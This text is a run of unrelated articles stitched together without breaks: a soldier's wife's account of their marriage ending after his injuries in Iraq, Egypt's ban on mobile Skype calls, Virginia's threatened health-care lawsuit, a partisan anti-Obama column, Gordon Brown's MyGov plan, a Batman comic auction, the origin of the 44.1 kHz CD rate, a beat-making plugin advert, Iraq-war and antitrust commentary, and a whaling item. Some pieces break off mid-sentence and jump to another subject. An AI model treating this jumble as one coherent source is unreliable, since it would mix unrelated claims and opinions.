My husband , Captain Peter Norton , a bomb disposal expert , had always been a man of few words , and his military training had not encouraged him to talk about his feelings , even since his terrible injuries .
Focused as he was on his recovery , I felt I had been left to look after the family alone .
I tried to explain how difficult I was finding everything , and that I could no longer cope .
I did n't want to sound as if I was complaining , or offend him by seeming resentful about the care he needed from me , for how could I compare my struggles to the terrible trauma that he had suffered ?
I felt full of guilt , believing Pete would understand without my having to say too much .
But as far as Pete was concerned , the next step after finishing his rehab was for him to go straight to Shrivenham , on the Wiltshire / Oxfordshire border , where he had been about to begin an MSc course in Explosive Ordnance Engineering before his last tour of duty in Iraq .
WHO KNEW ?
Thirty - two British soldiers injured in Afghanistan had their limbs amputated in 2009
He had always planned to become an Army instructor after his time as a soldier , so it was all part of his career plan .
His gruff reply to my suggestion - ' Well , you do what you have to ' - was non-committal .
I could see the pain in his eyes and the look of incomprehension on his face .
I knew he did n't want to go to Essex , but for me to come and live with him in married quarters at Shrivenham instead .
But if I did that , I would not have the support of my family .
I knew I would not be able to manage .
In 2006 , I had written in this paper about my hopes for the future , determined to start family life afresh after Pete had gone through a year of medical rehab .
But looking back now , I realise that conversation , a year later , was the pivotal point in our marriage - the make - or - break moment when I recognised we would have to go our separate ways .
I still loved my husband , as he probably still loved me , and wanted us to stay together as a family .
But I also knew I could n't take any more of the physical and psychological strain of looking after two small children and an amputee .
My priority had to be our two small sons .
If I allowed myself to be ground down to the point where I could no longer care for them properly , I would be letting the whole family down .
War hero : Captain Peter Norton collects his George Cross with Sue and children Toby and Tom
By the time Pete went off on his last tour of duty in March 2005 , we 'd been married ten years .
We 'd met while I was working as a civil servant for the MoD .
Pete had just been promoted to warrant officer and was clearly destined to go far .
Once our relationship was in full swing , I 'd been keen to settle in Cambridgeshire , but Pete was back with his regiment , the 11th Explosive Ordnance Disposal Regiment of the Royal Logistic Corps .
The country was at war with Iraq and I knew it was only a matter of time before he might be called on to go , too .
It would be his one and only tour of duty during our time together .
When he was called on to leave , the timing could n't have been worse , as I 'd just given birth to Toby .
I spent the entire four months
Pete was away fearing something would happen to him .
But I knew , like any Army wife , that I had to learn to cope with my fears and get on with life .
I cherished every letter or phone call I received from Pete , desperately hanging on to the knowledge that he was still OK .
Every night I watched the evening news with dread in my heart .
When I found a uniformed man and woman on my doorstep at three in the morning on July 25 , 2005 , my first thought was : ' Just let him be alive . '
I sat in numbed silence as they told me Pete had been part of a team of coalition troops , including Americans and Australians , when he'd stepped on a secondary device , two shells wired to a sensor .
But as I heard one of the officers say , ' Pete has been very seriously injured ' , my heart flooded with relief .
' Injured ' to me could be coped with , got over .
When I found a uniformed man and woman on my doorstep at three in the morning on July 25 , 2005 , my first thought was : ' Just let him be alive '
Even after they read out the apparently endless list of Pete 's injuries - ' loss of left leg , left arm , severe injury to the buttock and lower right leg ' - I tried to remain calm .
I felt we could recover from anything as a family , even this .
But I was wrong .
An Army family liaison officer escorted seven - month - old Toby and me first to Newport to collect a passport for Toby , and then to London where we caught a flight from Heathrow to Germany , where Pete was being cared for in hospital .
On our arrival at the hospital , staff warned me not to cry as this might distress Pete and possibly delay his recovery .
I remember thinking ; ' Oh , please - just let me see my husband ! '
When I finally did see Pete , his neck was in a brace , covered in bandages , an intravenous drip connected to his nose and mouth .
I should have been shocked , but the overwhelming feeling of unconditional love took over .
Although Pete was clearly in a lot of pain , and over the ensuing months was sustained with heavy doses of painkillers , I reminded myself that he could have no better incentive to recover than wanting to be an active father again to the two boys he loved so much .
After being flown to Selly Oak Hospital near Birmingham , he began an agonisingly slow recovery , interrupted by frequent infections .
Over the course of the following year , I visited Pete two or three times a week , driving from Gloucester to Birmingham and always taking the boys with me .
Although our visits never failed to lift Pete 's spirits , as they did mine to see my husband with both our sons looking so happy , it also meant that Pete and I had no time to ourselves to talk alone .
Even after Pete began to make home visits at weekends , it was still very difficult for us to talk intimately to one another .
Most of my time was spent either moving my husband 's bed into the living room so that he could watch TV with the boys , or washing , dressing and bathing him .
By the time I had cooked three meals and got the boys into bed , I was too tired to have any meaningful conversation .
Before the accident : Sue had just given birth to their son Toby when Peter was sent to Iraq
An archeologist and former MoD civil servant , I 'd given up my career after becoming pregnant with my first child .
On top of looking after the children , I began to feel as if I 'd been turned from being Pete 's wife into his carer and nurse .
By April 2006 , I was already physically exhausted and went to my GP for help .
Getting a carer from the NHS for weekends helped with the physical work but did little to lessen the psychological strain of a part - time marriage .
In June , Pete was transferred to Headley Court , the defence medical rehabilitation in Surrey , where we again visited him as often as we could .
But when we tried to have family days out , it was a nightmare .
Manoeuvring the wheelchair and a pushchair into the car , getting everyone in and out , remembering a nappy change for Toby and a colostomy bag for his father all became increasingly impossible for me to cope with .
Pete 's weekends home , which I 'd always so looked forward to , gradually turned into something I dreaded .
If I had known where , or how to get help , I would have done .
I felt as if I was drowning in physical and psychological exhaustion .
In a last attempt to save my marriage , I made an appointment to see a Relate counsellor , who was immensely sympathetic .
But when she asked if Pete would come along , I knew there was no way , because he hated talking about his emotions .
Besides , the wheelchair would n't have fitted in the building .
I also realised I could n't afford to continue with the marriage therapy , and after two free sessions did not go back .
Although Pete still received his salary from the Army , I no longer worked so we had to keep to a budget .
Foolishly , I hoped communication between Pete and I would just get better as his health improved .
Instead , our relationship deteriorated rapidly as the less we talked , the more distant we felt from each other .
We spent more time talking about ' arrangements ' than how we really felt .
Looking back , I realise we were both as stubborn as one another .
But the result was that our love slowly faded to the point that divorce seemed inevitable .
Some of my closest friends refused to speak to me after I told them that Pete and I were splitting up , questioning how I could walk away from a war hero when he needed me
Six months later , in June 2007 , Pete and I separated .
We 'd had that initial conversation about splitting earlier in the year and by then we had grown to accept it .
Pete told me he had been advised we should divorce rather than just separate , so I filed and the decree absolute came through two years later .
Meanwhile , I found a house for the boys and me next door to my elderly parents in Essex , and Pete moved to Wiltshire to begin his MSc at Shrivenham .
In typical fashion , we never had a final conversation or even a proper goodbye .
As we had not lived together as a family for the previous two years , being apart permanently did not even seem that odd any more .
We did n't tell the boys that we were getting a divorce .
As they only ever remembered having their father around at weekends , we felt it would n't really make any difference to them .
I felt as if I 'd finally reached the end of a long and hard road , deeply sad but determined to do the best for our sons .
During all the time that I had been struggling to cope with my family , I kept thinking there must be other women like me with wounded husbands or sons .
Determined that something good would come from the breakdown of our marriage , I set about finding out more .
After getting in touch with SSAFA ( the Soldiers , Sailors , Airmen and Families Association ) , I asked whether there was any thing similar to the U.S. Forces - owned Fisher Houses .
These provide accommodation for the relatives of wounded service personnel so the family can stay close by while they are getting medical treatment .
Toby and I had stayed in one in Germany while visiting Pete in hospital .
When I was told there was n't an equivalent over here , SSAFA and the MoD agreed to meet me to discuss the possibility of raising funds to provide similar houses in Britain .
Within six months , SSAFA had managed to raise enough money to build not one , but two houses for relatives of those wounded in the Armed Forces , the first at Headley Court in February 2008 and the second at Selly Oak a year later .
These were named the Norton Homes in tribute to Pete .
I felt very proud to have been the inspiration to help other families affected , and Pete , too , was thrilled about our achievement .
I know there will be many who will criticise me for speaking out about the strain of being married to an amputee , wondering : ' How could she ? '
Even some of my closest friends refused to speak to me after I told them that Pete and I were splitting up , questioning how I could walk away from a war hero when he needed me .
Perhaps if we had both been given access to more psychological and practical support , we might have been able to save our marriage .
Pete , now 48 , teaches at the UK Defence Academy at Shrivenham , Wiltshire .
Tom and Toby 's happiness is paramount to us both , so I take the boys to see their father for one day each fortnight .
Although Pete 's brother helps him with this , it is difficult for me to leave the boys for much longer with their father as he is still confined to a wheelchair and could not run after them in an emergency .
Pete and I are now more like polite strangers than ex-spouses , but our sons are happy , and I now look forward to the future with hope .
All I can say is that no woman who has not been through living with and caring for a victim of the fallout from war can truly understand what it is like .
It does not mean that you stop loving the person who has been injured , be it husband , son or boyfriend ; simply that the pressures involved in day - to - day life can sometimes become intolerable .
INTERVIEW : CLARE CAMPBELL
You can donate to SSAFA , a national charity committed to helping those who serve in our Armed Forces , those who used to serve and the families of both , via the internet at donate.ssafa.org.uk , or by sending a cheque , with your name and address , to : SSAFA Forces Help - Femail , Freepost NAT 19507 , London SE1 2BR .
Skype has 500 m users around the world
Egypt has reportedly banned mobile calls made through services such as Skype .
Skype and other operators offering VoIP ( voice over internet protocol ) services bypass telephone networks in favour of offering free calls via the net .
Egyptian law states that all international calls must pass through state - owned Egypt Telecom .
The ban .
reported by various news agencies , does not extend to voice calls made over fixed - line internet .
The ban applies to Egypt 's three mobile operators , Vodafone , Mobinil and Etisalat and came into effect at the weekend .
" The National Telecom Regulatory Authority issued a decision to stop VoIP and we stopped it on Saturday , " Khaled Hegazy , Vodafone Egypt 's external affairs director told AFP .
Skype has 500 million users worldwide .
In a statement the firm said : " In general , we believe it should be up to consumers , not regulatory authorities , to choose the winners and losers in the communications space . "
Many mobile operators now offer Skype services , although it is still a relatively small market .
Egypt is not the first country to ban such services .
Earlier in the month the United Arab Emirates said it would not give VoIP licenses to international companies such as Skype .
Cuccinelli's office confirms Virginia will sue over health care
A spokesman for Virginia Attorney General Ken Cuccinelli II ( R ) said this afternoon that Virginia will file suit against the federal government if the Democratic health care reform bill is approved by the U.S. Congress .
Cuccinelli has long said he was examining the legal issues and suggested he would likely file suit .
Brian Gottstein , a spokesman for the office , said this afternoon that a lawsuit is now a definite .
Gottstein would provide no details of the legal rationale for such a suit , indicating the process is " still being worked out . "
Virginia last week became the first state in the country to pass a state bill declaring it illegal for the government to require individuals to purchase health insurance , a key part of bills under consideration on Capitol Hill .
We are also expecting to receive a letter shortly that Cuccinelli is sending to House Speaker Nancy Pelosi ( D - Calif . ) warning her that using the so - called " deem and pass " procedure to pass the Senate health reform bill in the House would open the measure to additional constitutional challenges from the states .
UPDATE : We 've received a copy of Cuccinelli 's letter to Pelosi .
In it , he writes : " Should you employ the deem and pass tactic , you expose any act which may pass to yet another constitutional challenge . "
The full letter is included after the jump .
March 17 , 2010 The Honorable Nancy Pelosi Speaker of the United States House of Representatives Office of the Speaker H-232 , U.S. Capitol Washington , D.C. Dear Speaker Pelosi : I am writing to urge you not to proceed with the Senate Patient Protection and Affordable Care Act under a so - called " deem and pass " rule because such a course of action would raise grave constitutional questions .
Based upon media interviews and statements which I have seen , you are considering this approach because it might somehow shield members of Congress from taking a recorded vote on an overwhelmingly unpopular Senate bill .
This is an improper purpose under the bicameralism requirements of Article I , Section 7 of the U.S. Constitution , one of the purposes of which is to make our representatives fully accountable for their votes .
Furthermore , to be validly enacted , the Senate bill would have to be accepted by the House in a form that is word - for - word identical ( Clinton v. City of New York , 524 U.S. 417 ( 1998 ) ) .
Should you employ the deem and pass tactic , you expose any act which may pass to yet another constitutional challenge .
A bill of this magnitude should not be passed using this maneuver .
As the President noted last week , the American people are entitled to an up or down vote .
Sincerely , Kenneth T. Cuccinelli , II Attorney General of Virginia
New college graduates may be entering the worst job market in decades , but there are still some majors that pay off — and all of them are in the applied sciences .
A new report from the National Association of Colleges and Employers finds that eight of the top 10 best - paid majors are in engineering , with petroleum engineering topping off the list at $ 86,220 .
See Table .
" Petroleum ...
Barack Obama is the best thing that has happened to America in the last 100 years .
Truly , he is the savior of America 's future .
He is the best thing ever .
Despite the fact that he has some of the lowest approval ratings among recent presidents , history will see Barack Obama as the source of America 's resurrection .
Barack Obama has plunged the country into levels of debt that we could not have previously imagined ; his efforts to nationalize health care have been met with fierce resistance nationwide ; TARP bailouts and stimulus spending have shown little positive effect on the national economy ; unemployment is unacceptably high and looks to remain that way for most of a decade ; legacy entitlement programs have ballooned to unsustainable levels , and there is a seething anger in the populace .
That 's why Barack Obama is such a good thing for America .
Obama is the symbol of a creeping liberalism that has infected our society like a cancer for the last 100 years .
Just as Hitler is the face of fascism , Obama will go down in history as the face of unchecked liberalism .
The cancer metastasized to the point where it could no longer be ignored .
Average Americans who have quietly gone about their lives , earning a paycheck , contributing to their favorite charities , going to high school football games on Friday night , spending their weekends at the beach or on hunting trips -- they 've gotten off the fence .
They 've woken up .
There is a level of political activism in this country that we have n't seen since the American Revolution , and Barack Obama has been the catalyst that has sparked a restructuring of the American political and social consciousness .
Think of the crap we 've slowly learned to tolerate over the past 50 years as liberalism sought to re-structure the America that was the symbol of freedom and liberty to all the people of the world .
Immigration laws were ignored on the basis of compassion .
Welfare policies encouraged irresponsibility , the fracturing of families , and a cycle of generations of dependency .
Debt was regarded as a tonic to lubricate the economy .
Our children left school having been taught that they are exceptional and special , while great numbers of them cannot perform basic functions of mathematics and literacy .
Legislators decided that people could not be trusted to defend their own homes , and stripped citizens of their rights to own firearms .
Productive members of society have been penalized with a heavy burden of taxes in order to support legions of do - nothings who loll around , reveling in their addictions , obesity , indolence , ignorance and " disabilities . "
Criminals have been arrested and re-arrested , coddled and set free to pillage the citizenry yet again .
Lawyers routinely extort fortunes from doctors , contractors and business people with dubious torts .
We slowly learned to tolerate these outrages , shaking our heads in disbelief , and we went on with our lives .
But Barack Obama has ripped the lid off a seething cauldron of dissatisfaction and unrest .
In the time of Barack Obama , Black Panther members stand outside polling places in black commando uniforms , slapping truncheons into their palms .
ACORN -- a taxpayer - supported organization -- is given a role in taking the census , even after its members were caught on tape offering advice to set up child prostitution rings .
A former Communist is given a paid government position in the White House as an advisor to the president .
Auto companies are taken over by the government , and the auto workers ' union -- whose contracts are completely insupportable in any economic sense -- is rewarded with a stake in the company .
Government bails out Wall Street investment bankers and insurance companies , who pay their executives outrageous bonuses as thanks for the public support .
Terrorists are read their Miranda rights and given free lawyers .
And , despite overwhelming public disapproval , Barack Obama has pushed forward with a health care plan that would re-structure one - sixth of the American economy .
I do n't know about you , but the other day I was at the courthouse doing some business , and I stepped into the court clerk 's office and changed my voter affiliation from " Independent " to " Republican . "
I am under no illusion that the Republican party is perfect , but at least they 're starting to awaken to the fact that we cannot sustain massive levels of debt ; we cannot afford to hand out billions of dollars in corporate subsidies ; we have to somehow trim our massive entitlement programs ; we can no longer be the world 's policeman and dole out billions in aid to countries whose citizens seek to harm us .
Literally millions of Americans have had enough .
They 're organizing , they 're studying the Constitution and the Federalist Papers , they 're reading history and case law , they 're showing up at rallies and meetings , and a slew of conservative candidates are throwing their hats into the ring .
Is there a revolution brewing ?
Yes , in the sense that there is a keen awareness that our priorities and sensibilities must be radically re-structured .
Will it be a violent revolution ?
No .
It will be done through the interpretation of the original document that has guided us for 220 years -- the Constitution .
Just as the pendulum swung to embrace political correctness and liberalism , there will be a backlash , a complete repudiation of a hundred years of nonsense .
A hundred years from now , history will perceive the year 2010 as the time when America got back on the right track .
And for that , we can thank Barack Hussein Obama .
____________
Gary Hubbell is a hunter , rancher , and former hunting and fly - fishing guide .
Gary works as a Colorado ranch real estate broker .
He can be reached through his website , aspenranchrealestate.com http://www.aspentimes.com/article/20100228/ASPENWEEKLY/100229854
A MyGov dashboard that allows every citizen to personalise the explosive growth of government services on the web was proposed today by Gordon Brown .
The prime minister suggested a new wave of web technology will open up policy - making , ending the current paternalistic Whitehall monopoly .
In a wide - ranging speech on the impact of the web on the government , he said the MyGov dashboard will make citizen interaction with government as easy as internet banking or online shopping .
Instead of civil servants or politicians being the sole authors of government information , he claimed that open source information will allow citizens to shape information for their own needs .
Brown said MyGov , which will eventually replace DirectGov , will end the current frustration of web users needing to identify themselves separately for different public services .
He also said the dashboard will allow the citizen to manage their pensions , tax credits and child benefits , as well as pay council tax , fix doctors or hospital appointments , apply for schools of their choice and communicate with children 's teachers .
Brown , who was once described as an analogue politician in an internet age , praised the development of an Asborometer by software developer Jeff Gilfelt .
The iPhone app allows users to locate the level of antisocial behaviour in a borough , including the number of crack houses closed , asbo statistics and area league tables .
Brown promised that all public service contracts worth more than £ 20,000 will be provided on a free online database .
In addition to this , Martha Lane Fox , the co-founder of lastminute.com , will extend her brief from championing digital inclusion , to overseeing the spread of government data to citizens .
Brown said that by the autumn , the government will publish all non-personal datasets held by departments and quangos , forming an electronic doomsday book for the 21st century .
He said the book will allow for the first time , the public to access in one place information in each set of data , including its size , source , format , content , timeliness , cost and quality .
He said any business or developer will be free to develop the information as they please .
Brown also promised £ 30 m worth of funding to create an Institute of Web Science , which will work on the economic and social benefits of the web .
Likening the second wave of superfast broadband to the advent of electricity , Brown insisted that unlike the Conservatives , Labour were investing in digital infrastructure to ensure it was available to 90 % of the public .
He did not set a date , but has previously said a 50 M bps network will be available by 2017 , partly paid for by the new 50 p tax on phonelines .
The Tories would use a combination of deregulation and a portion of the BBC licence fee to create a 100 M bps network .
The comic book cover is one of the most famous of all time A comic showing the debut of superhero Batman has been sold for more than $ 1 m ( £ 655,000 ) at an auction in Dallas .
The rare 1939 copy of Detective Comic
No 27 was bought by an anonymous bidder from a seller who also wished to keep their identity secret .
The sale comes just days after an early edition of a Superman comic sold for $ 1 m - only to be outdone by Batman .
Barry Sandoval , of auction house Heritage , claimed it was the biggest price on record for a comic book .
" It pretty much blew away all of our expectations , " he said of the $ 1.075 m winning bid .
" We can really say that Batman has nosed out Superman , at least for now . "
Mr Sandoval added that the cover of the comic - which was bought by the seller in the 1960s for $ 100 ( £ 65 ) - is one of the most famous in comic book history .
According to experts , the debuts of Batman and Superman were always likely to be the first to break the $ 1 m barrier , with both examples in excellent condition .
Shirrel Rhoades , former publisher and executive vice president of Marvel Comics , added that the two sales were likely to keep prices buoyant .
" We 're probably seeing a little bit of a feeding frenzy , " he said , adding that comic books are seen as a sound investment .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Explanation of 44.1 kHz CD sampling rate
The CD sampling rate has to be larger than about 40 kHz to fulfill the Nyquist criterion that requires sampling at twice the maximum analog frequency , which is about 20 kHz for audio .
The sampling frequency is chosen somewhat higher than the Nyquist rate since practical filters neede to prevent aliasing have a finite slope .
Digital audio tapes ( DATs ) use a sampling rate of 48 kHz .
It has been claimed that thier sampling rate differs from that of CDs to make digital copying from one to the other more difficult .
48 kHz is , in principle , a better rate since it is a multiple of the other standard sampling rates , namely 8 and 16 kHz for telephone - quality audio .
Sampling rate conversion is simplified if rates are integer multiples of each other .
From John Watkinson , The Art of Digital Audio , 2nd edition , pg. 104 :
In the early days of digital audio research , the necessary bandwidth of about 1 Mbps per audio channel was difficult to store .
Disk drives had the bandwidth but not the capacity for long recording time , so attention turned to video recorders .
These were adapted to store audio samples by creating a pseudo - video waveform which would convey binary as black and white levels .
The sampling rate of such a system is constrained to relate simply to the field rate and field structure of the television standard used , so that an integer number of samples can be stored on each usable TV line in the field .
Such a recording can be made on a monochrome recorder , and these recording are made in two standards , 525 lines at 60 Hz and 625 lines at 50 Hz .
Thus it is possible to find a frequency which is a common multiple of the two and is also suitable for use as a sampling rate .
The allowable sampling rates in a pseudo - video system can be deduced by multiplying the field rate by the number of active lines in a field ( blanking lines cannot be used ) and again by the number of samples in a line .
By careful choice of parameters it is possible to use either 525/60 or 625/50 video with a sampling rate of 44.1KHz .
In 60 Hz video , there are 35 blanked lines , leaving 490 lines per frame or 245 lines per field , so the sampling rate is given by : 60 X 245 X 3 = 44.1 KHz
In 50 Hz video , there are 37 lines of blanking , leaving 588 active lines per frame , or 294 per field , so the same sampling rate is given by 50 X 294 X3 = 44.1 Khz .
The sampling rate of 44.1 KHz came to be that of the Compact Disc .
Even though CD has no video circuitry , the equipment used to make CD masters is video based and determines the sampling rate .
Also , David Singer noted that 44,100 can be factored as 2^2 * 3^2 * 5^2 * 7^2 , i.e. , the product of the squares of the first four prime numbers .
Nerve Powerful beat manipulation and creation Buy Now $ 199.00 USD
Plugin Power Nerve runs as a VSTi or AudioUnit plugin .
Nerve was designed and coded by veteran dance music producers , with a diverse sample library included from many of todays top sound designers .
Create your own beats entirely from scratch using sounds you already have ( AIF / WAV / REX / RX2 / AKAI .SND ) , or utilize the factory - included Drum Kits , Presets , Patterns , and Sounds .
Powerful Internal Step Sequencer Nerve has an ergonomic mouse - driven Step Sequencer which allows you to program beats visually or by clicking rhythmically , with minimal mousing .
Compact , hassle - free interface Everything you frequently want to control is instantly accessible in Nerve - no fumbling and excessive paging around to get things sounding how you want , in a window which wo n't consume your entire screen real - estate .
Thousands of Original Sounds Included Nerve contains a large , comprehensive 2 - Gigabyte library containing full presets , drumkits , patterns , one - shots , and loops made by a variety of world - class sound designers , including SampleMagic , PowerFX , Richard Devine , Dom Kane , SampleSquad , Bitword , Noise Inc. , , and many others , catering to a wide variety of musical genres .
Sculpt your own original sounds you can drag - and - drop soundfiles you already have on your hard disk ( WAV / AIF / REX / RX2 / AKAI SND format ) and audition different samples instantly using navigation buttons .
Random sample selection from the current folder ( for one or all pads ) is possible with hotkeys , for exploration of new sound combinations effortlessly .
On - board editing with 22 simultaneous pre-calculated DSP types allows you to slice / trim , sculpt , stretch , and bend and re-synthesize sounds into completely new sounds , with no play - time CPU expense .
Slice and Re-arrange loops
Nerve allows for a single pad to contain up to 16 slices of a loop , with adjustable slice points , which will automatically get read from REX / RX2 files .
For traditional WAV / AIF loops , three different user - selectable time - stretching options are available ( slice + fill , granular stretch , resample ) to get your loop to match your host sequencer BPM .
Let your Rhythms Groove +
Gel Nerve allows you to extract the timing + level information from a REX / RX2 loops , and have this apply to all of the rhythms with a single mouse gesture .
You can store swing presets for future use .
Performance - Oriented features
Nerve features a unique Repeater control which allows you to re-trigger one or more pads on - the - fly to create fills and variations on - the - fly .
Trigger / Re-trigger patterns with the mouse or MIDI notes .
Re-triggered portions can be automatically ' sent ' to a different output pair for additional external processing on those specific moments .
Unlike audio - based buffer - repeating effects , Nerve 's Repeater will follow swing / groove feel on a global level , maintaining your groove .
Furthermore , re-triggered steps will also generate new MIDI - out notes , if using Nerve for controlling external samplers , etc. Realtime Sculpting Control Each pad contains a unique ' fat ' 2x - oversampled State Variable Filter .
Flexible LFOs allowing you to make parts vary over time ( pan/ level / cutoff / reso / sample start ) , allowing for parts to sound more fluid .
MultiStage Envelopes with tension curves allow for dynamic sculpting with high precision .
A unique GATE parameter allows the envelope length to rescale , sequenced per-step and / or controlled / automated externally .
* Internal Sidechain - input Compressor – get your beats to pump without all of the in - host bussing hassle .
Pad Independence
Each pad can optionally run its own pattern chain , length , and randomize , making it very easy to create polyrhythms / polymetric beats giving your music productions interesting , unique flair .
Multiple Output capability ( 8 stereo pairs ) allow you to separate various parts of the beat for external mixing / processing .
MIDI support ( both input and output ) Control Nerve from a MIDI controller using assignable MIDI notes .
Control Nerve parameters from MIDI CC messages .
MIDI
Out control allows you to use Nerve as a “ sequence engine ” to generate notes / CC's in unique ways / control or layer other synths and samplers .
Try it out !
The Nerve demo is free but is limited to 20 minutes ( per operation ) , and only includes minimal content .
Saving is disabled in the demo .
Windows Demo ( VST and AAX ) | MacOS ( VST AU AAX ) |
In April 2003 , I was embedded with the US Army ’s 7th Cavalry in the western suburbs of Baghdad , sleeping on top of a Humvee .
Seven years later I still wonder why we were there .
So , I suspect , do many Americans .
What responsibility – what options – do generals have when they believe civilian leaders , the president , the vice president , and the secretary of Defense , are bent on a “ wrongheaded ” war ?
I recently put that question to former Undersecretary of Defense for Policy Douglas Feith , who served from 2001 to 2005 and was a major architect of the war in Iraq .
“ If it ’s a debate over what ’s the smart and right thing to do , ” he said , “ the president is the elected representative of the American people .
Somebody has to make policy for the country , and the country decides by democratic means [ that ] it ’s going to be the president . ”
His implication seemed clear .
Americans elected George W. Bush , and the public must live with the consequences of its former president ’s decision .
As I write this , the Associated Press is reporting that Iraqi gunman dressed as US and Iraqi Army soldiers raided Sunni Arab homes south of Baghdad and executed 24 people , including five women , then brutalized the bodies beyond recognition .
The catalog of what has gone wrong during the US occupation is thicker than the Manhattan phone book .
Despite some encouraging signs , such as parliamentary political jockeying as Baghdad lurches toward civilian government , Mr. Feith was only modestly hopeful about Iraq ’s progress .
“ All the things which have been gigantic problems in recent years remain , ” he said .
“ The fact that the political system is evolving is good and hopeful .
But it ’s not inevitable .
You can still have a breakdown and a lot of violence . ”
A friend with the US Agency for International Development privately told me that when the Americans leave Iraq there will be an “ enormous score - settling between majority Shiites and minority Sunnis . ”
Opponents of the war have vilified Feith , although he sees himself as “ a man more sinned against than sinning . ”
His book “ War and Decision ” seems the definitive Bush administration defense of the war to date .
In our interview , Feith portrayed a Bush administration at war with itself , with Secretary of State Colin Powell and the Central Intelligence Agency undercutting the Pentagon ’s civilian leadership and President Bush ’s policy .
Unanswered is why Bush tolerated this .
Other recent books about Iraq , such as “ The Fourth Star , ” by Greg Jaffe and David Cloud , suggest even greater internal disarray and conflicting goals .
The authors say that “ President Bush wanted to transform Iraq into a model democracy for the Middle East . ”
Defense Secretary Donald Rumsfeld , meanwhile , wanted to get out of Iraq as soon as possible .
And the generals wanted to turn the war over to a future Iraqi Army just as quickly .
The original casus belli , Saddam Hussein ’s alleged weapons of mass destruction , has become the stuff of revisionist history .
Feith blames the error largely on bad intelligence from the CIA , which allegedly led the president to believe that Mr. Hussein had stockpiled chemical and biological weapons and that he had a nuclear weapons program .
Feith suggests Washington was fooled because of Hussein ’s bluff about weapons he no longer had .
The Iraqi leader feared more uprisings by Kurds and Shiites , and Feith now speculates that Hussein deliberately wanted potential insurrectionists in his own country to believe he had WMDs to use if they revolted again .
My own difficulty with that explanation is that it leaves the impression that Bush blundered into an unnecessary war because of a bluff .
Perhaps most curious is Feith ’s contention that the Bush administration never did anything to promote the idea that Hussein or Iraq was linked to the 9/11 terrorism in order to manipulate public opinion .
“ I do n’t believe anybody ever said Saddam Hussein was responsible for 9/11 , ” he said .
“ Why then polls showing more than 60 percent of the American public believed Iraq was implicated ? ” I asked .
“ Who led us down that road ? ”
“ I know I never believed it , ” Feith said .
Former counterterrorism czar Richard Clarke has accused Mr. Rumsfeld and his deputy , Paul Wolfowitz , of taking advantage of the 9/11 tragedy to promote their agenda of deposing Hussein .
What emerges today is an unflattering picture of Bush ’s war presidency .
He got WMDs wrong .
He ran an embarrassingly “ weak shop , ” ignoring destructive bureaucratic infighting in Washington .
Most astonishing , Bush ’s critical judgments were so badly flawed he allowed himself to be persuaded that leaving a petty Arab tyrant like Hus sein in power actually threatened the mighty United States of America , which defeated Nazi Germany and Japan and won the cold war against the Soviet Union .
It is simply mind - boggling .
Walter Rodgers , a former senior international correspondent for CNN , writes a biweekly column .
C ORPORATE C RIME R EPORTER
Robert Bork , William Baxter and the Monopolization of America
24 Corporate Crime Reporter 7 ( 12 ) , February 13 , 2010
You walk into your local convenience store and head to the cold walk - in beer room in the back .
The choice is overwhelming .
Budweiser , Michelob , Bud Light , Busch Light , Stella Artois , Grolsch , Kirin , Tsingtao , Corona , Negra Modelo , Rolling Rock , Widmer , Miller and Coors .
In fact , all of these beers are controlled by two companies .
MillerCoors under the direction of South African Breweries ( SAB ) and AnheuserBusch In Bev .
Two multinational corporations controlling the beer choices of 300 million Americans .
And it ’s not just beer .
One single multinational corporation dominates the world supply of eyeglass stores .
One dominates the milk supply .
Barry Lynn goes down the list of industries .
And he finds a similar story across the board .
A handful of multinational corporations controlling each industry – or the supply chains of each industry .
Such dominant monopolies were illegal just thirty years ago .
But that all changed with Ronald Reagan and Robert Bork .
A corporatist oligarchy took hold .
President Obama has promised aggressive antitrust enforcement .
But Lynn says it ’s pie in the sky .
“ It will take more than a lawsuit or two to overthrow America ’s corporatist oligarchy and restore a model of capitalism that protects our rights as property holders and citizens , ” Lynn argues in his new book – Cornered : The New Monopoly Capitalism and the Economics of Destruction ( Wiley , 2010 ) .
Antitrust law was developed to protect the political economy from extreme concentrations of corporate power .
Then came Reagan and Bork .
In 1978 , Bork said we should have a consumer welfare test .
If economic concentration is good for the consumer – think Wal - Mart – then let it be .
Never mind the citizen .
In 1981 , William Baxter , head of Reagan ’s Antitrust Division , announced that he would be guided by “ an efficiency test . ”
“ When Baxter first talked to the press in 1981 , he said – we are going to impose an efficiency test , ” Lynn told Corporate Crime Reporter last week .
“ Those were the words he used .
It was only a little bit later that they framed it as a consumer welfare test .
And Robert Bork came up with that .
Bork ’s book – The Antitrust Paradox – came out in 1978 and he floated this idea of a consumer welfare test . ”
“ It took Baxter a couple of years to get the messaging together .
They locked into the consumer welfare test .
And it helped to bring along so many folks in the consumer movement .
And for some reason , after focusing on safety , which is a fantastic thing that Ralph Nader did , they began fixating on prices .
And there is a whole political analysis as to why they began fixating on prices .
What groups were they targeting with that fixation ? ”
“ In 1981 , that marked a revolutionary change in how we applied our anti-monopoly laws .
No longer was the primary consideration political .
The primary consideration was prices and consumer welfare . ”
Lynn says that Bork did n’t understand why the consumer movement did n’t come after him on the consumer welfare test .
“ In 1993 , Bork put out a second edition of the Antitrust Paradox , ” Lynn said .
“ And in the introduction , he says – I do n’t understand what happened here .
I thought the socialists were doing to come out and fight us tooth and nail on this .
And they never did .
We did n’t think we were going to get this through .
And we did . ”
Mention the word “ socialist ” in this context , and Lynn sees red .
“ In this country , the group that tends to point its finger and calls the other people socialists most effectively tends to win , ” Lynn said .
“ And when they win – they get to socialize their own risks . ”
“ So , you have this elite in this country that for a generation has been raving about socialism . ”
“ And what were they doing in the meantime ?
They were socializing all of their risks . ”
“ As was laid bare to us in September 2008 .
Larry Summers put it best – what the bankers did , he said , was they privatized all of their profits and socialized all of their risks . ”
“ You really have to target the other people and call them socialists . ”
“ We have just seen the most massive era of socialization in this country that we ’ve ever seen . ”
( For a complete transcript of the Interview with Barry Lynn , see 24 Corporate Crime Reporter 7 ( 12 ) , February 15 , 2010 , print edition only . ]
Home
Do I even need to explain the fake bit of this one ?
I was knee deep in blank floppy discs and had X - Copy running within minutes .
Every “ computer club ” that sprang up in the eighties was just a big piracy meetup .
Good times !!
( PS : Video game piracy is wrong please do n’t pirate my games oh God please )
Proposal would let three countries kill reduced number of whales for a decade before phasing out hunt
The US is spearheading an attempt to limit , and possibly phase out , whale hunting by Japan , Iceland and Norway ahead of a crucial meeting of the International Whaling Commission .
